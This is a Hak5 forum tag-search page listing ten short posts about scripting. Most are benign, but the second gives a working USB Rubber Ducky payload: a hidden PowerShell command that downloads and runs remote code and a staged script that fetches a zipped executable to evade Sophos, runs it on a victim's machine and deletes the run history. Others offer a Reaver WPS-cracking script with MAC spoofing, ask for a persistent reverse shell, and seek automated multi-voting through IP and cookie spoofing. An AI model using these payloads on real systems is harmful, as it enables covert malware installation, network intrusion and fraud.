Jump to content

Search the Community

Showing results for tags 'scripting'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 10 results

  1. Let's see if I can adequately describe what I need help with here. I'm trying to shift the lines of a txt file do meet my required output. I'm trying to create a list of numbers to brute force a lock (that I own). This lock will ignore everything leading up to the correct pin. for example, if the pin is 1234 and enter 46541198751234 and it will unlock. In my research, I have discovered the De Bruijn sequence (https://en.wikipedia.org/wiki/De_Bruijn_sequence) which will allow me to quickly go through all possible PINs in a very efficient manner without having to enter each option individually. The problem is that as a weak brute force protection they lock allows for almost 40 keys to be pressed before it times out for 30 seconds. I have split the De Bruijn sequence down into 40 character lines, but to ensure that I do not miss any of the 4 digit pins I need to use the last 3 of the previous line at the start of the next. This also means that I have to cut 3 from the end of the line to stay within the 40 character limit. For example, if my file has the following list of numbers... 00000000000000000000 11111111111111111111 22222222222222222222 33333333333333333333 ... I would need to re-arrange them as follows 00000000000000000000 <- first line is untouched, but the last 3 numbers are used at the start of the next line 00011111111111111111 <- the last 3 of the previous line are added to the start of this one, but to make room 3 character are automatically bumped to the next line 11111122222222222222 <- and the process would need to continue until the end of the 100 or so lines 11111111122222222222 11111111111122222222 11111111111111122222 11111111111111111122 12222222222222222222 22223333333333333333 The also means that new lines would be added to the end of the list to accommodate the continually growing shift. Any clues on how to accomplish this?
  2. How does it work / what is it? I have just found one of the fastest ways of executing as much PowerShell code as you want using the USB Rubber Ducky! This script works by grabbing your PowerShell code from an external website. The code the ducky inputs is only 93 Characters long which takes the ducky only around 2 seconds to input. Tutorial: First, you will need a website to upload your .TXT file with all the PowerShell code you wish to execute. You can use a website such as hostinger or 000webhost to create this file. Although, remember these servers may not have 100% uptime. Script for website: The code on my website looks something like this... Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" $arr = (Get-Item -Path $path).Property $url = "www.linkToEndPayload" $output = "$env:temp/test.zip"; $out = "$env:temp/Remake.txt"; Remove-Item -Path $output Invoke-WebRequest -Uri $url -OutFile $output Unzip $output "$env:temp/" Rename-Item -Path $out -NewName "Remake.exe" Start-Process -FilePath "$env:temp/Remake.exe" foreach($item in $arr) { if($item -ne "MRUList") { Remove-ItemProperty -Path $path -Name $item -ErrorAction SilentlyContinue } } This code downloads the .EXE payload (Which is stored in a .ZIP file.) We will be running this file on our subjects system. Then the code uses an imported C# library to extract a. ZIP file which allows us to bypass a web protection software called Sophos from blocking the .EXE that we are trying to download. The file is unzipped and then the .EXE is run. Finally, the code deletes the run box history that the ducky creates. Finally, we have to setup the ducky. The ducky simply grabs the above code with a quick web request and then executes it. The code is as short and simple as this... Script for ducky: DELAY 500 GUI r DELAY 100 STRING powershell -W Hidden -Exec Bypass $a = Invoke-WebRequest www.linkToPowershellCodeAbove.com/script.txt; Invoke-Expression $a ENTER That's it! Very fast powershell execution. You can have as much code as you want on the script website. The only disadvantage to this code is that you must be connected to a internet connection. PS: I'm not very good at PowerShell Scripting
  3. I do not know if is possible <Uber Noob Here> but I'm trying to automate the capture of open WiFi traffic to be used with a headless Raspberry Pi or possible WiFi Pineapple. What I have so far is a basic Bash script (which a plan to run on startup) that set the wlan0 into monitor mode. Then does a 30 second capture of airodump-ng and writes the results to a csv file. From there I can use grep to fine only the lines that apply of a bssid with open authentication. What I want to do next, and the part that I currently have issues with is to find the bssid (row) with the highest value for iv's (traffic) and out put the value to it's channel column. From there I plan to restart airodump-ng to capture traffic on that defined channel and write it to a pcap file. Any suggestions on how to accomplish this next step? or am I going about this all wrong?
  4. Hello there guys! nice to see you! Just wanted to know about the power of python from you leets, im a beginner! trying to learn new things of python can you please tell me what are the things could be done with python?? Can I use python for IoT devices? is it gonna help me only in scripting ?
  5. please admins, i am not sure which category to post this under thats why am doing it on here. i am sorry if this violates your rules, incase it does please help me move it to the appropriate section. i hope i dont get a query for this tho. i just need help with a script that can do all that the topic says, i am testing a voting site, and ive been able to deduce that i can vote multiple times making use of "advanced cookie manager to clear the cookies sent from the server", "random agent spoofer to randomize the user agent on every request made", "Hide my ip to also randomise my ip after each vote". Note: they are all browser addons. which also means i have to reload the page everytym myself and click on a new ip each time. the only automated one is the random agent spoofer, and i also have to click by myself. dont wana sound lazy or anything but please, anyone who has an idea of how i can get an automated script that does all 3 "IP spoofing, User agent changing, and cookie deleting". any modern programming language would do the trick i guess, but if u know of steps i can take to achieve this by writing my own custom script please your ideas are also welcome. i need it asap. thanks in advance for your answers.
  6. Hello there! Which is the best programming language to start with? I have already learned a bit of C and JAVA. May I know the best language to start with? I want to learn to make wireless hacking tools for linux with my own coding knowledge, kindly help! Thanks!
  7. Hi all, I'm looking at making a script on a CD-ROM, that will; recognise the operating system of the machine it has been inserted in to run a specific script for that operating system Is there a cross-platform script/code language that would be recognised by both Windows and OSX, as a standard build? I understand that Python, for example, could run on both, however this would require the user to have installed it. Is there a language that both OSX and Windows would recognise straight-out-of-the-box? I tried a few internet searches, but everything I find pretty much states you have to download additional files to the PC (e.g; installing Python), which is no good. Thank you.
  8. Having used the duck to deploy the reverse shell which Darren originally posted on github, I am annoyed frequently that you are required to have a netcat listener up before the reverse shell is opened, and if you disconnect, you can't connect again without opening the reverse.exe file again and specifying the ip address etc. Shannon recently did her segment on a 20 second Mac hack, where she used code by Patrick Mosca. This code is designed so that even if netcat disconnects from the computer, you will still be able to reconnect again after 60 seconds. What I want to do is modify Darren's original code so that after 60 seconds or so, it checks if there is a connection or not, and if nothing is connected, it will rebroadcast to the host name or ip address waiting for netcat to catch the shell. I can't understand Darren's code (no offense Darren, I am new to the coding world :)) and I need to have this capability. Can someone please help me modify the code? Many Thanks, MB60893.
  9. I'm just learning how to Bash Script so I decided to make a nice and easy Reaver for idiots script. Let me know what you guys think or if anything else should be added, or any suggestions on the code. Just using this as a launch off point to learn stuff and eventually hopefully a full module for the pineapple. Just save the below to a file and execute #!/bin/bash clear echo "This script makes it easy to start a reaver attack" echo "" echo "[+] Do you need to setup a monitor interface? [y/n]" read setup if [[ $setup == 'y' ]]; then #Setup the monitor interface echo "[+] What Wireless interfaces do we have..." iwconfig echo "[+] Please select an interface to place into Monitor Mode [wlan0]" read interface if [[ $interface == '' ]]; then interface=wlan0 #Default to wlan0 fi echo "[+] Starting monitor Mode for $interface" airmon-ng start $interface iwconfig fi #End Mon Mode Setup Portion #Start part of script that executes regardless echo "[+] What monitor interface should I use? [mon0]" read monInterface if [[ $monInterface == '' ]]; then monInterface=mon0 #Default to mon0 fi #Spoof the Mon Mac echo "[+] MacSpoofing $monInterface" ifconfig $monInterface down macchanger -r $monInterface ifconfig $monInterface up #Check for Targets echo "" echo "[+] ------------------------------------------------------[+]" echo "[+] Checking for WPS enabled APs press (ctrl+c) when done [+]" echo "[+] ------------------------------------------------------[+]" wash -i $monInterface #Set Reaver Target echo "[+] What is the MAC for the target AP?" read target #Set optional functions reaver #to show the options available in terminal echo "[+] reaver -i $monInterface -b $target" echo "[+] Type any other reaver options you'd like besides the above" read reaverVars #Start REAVERINGGGGG!!!! echo "[+] Starting reaver (reaver -i $monInterface -b $target $reaverVars)" reaver -i $monInterface -b $target $reaverVars #Stop Monitor Mode Interface if the script set it up if [[ $setup == 'y' ]]; then echo "" echo "[+] killing Monitor Interface" airmon-ng stop $monInterface fi [/CODE]
  10. Hi Everyone, I am looking for 2-4 individuals to join a team in designing a network analyzer similar to WireShark. This position would be located in San Jose CA. They will be responsible for developing software that analyzes network traffic for application transactions. The job responsibilities include development of protocol analysis code; generate application transactions through scripts and programs using application APIs and statistics visualization. These individuals need to be extremely strong scripters using any of the following, perl, python, awk, shell, tcl, Sed, or php. Must have experience building scripting tools to analyze and monitor application performance. Would anyone be interested or have any advise for building such a team?
×
×
  • Create New...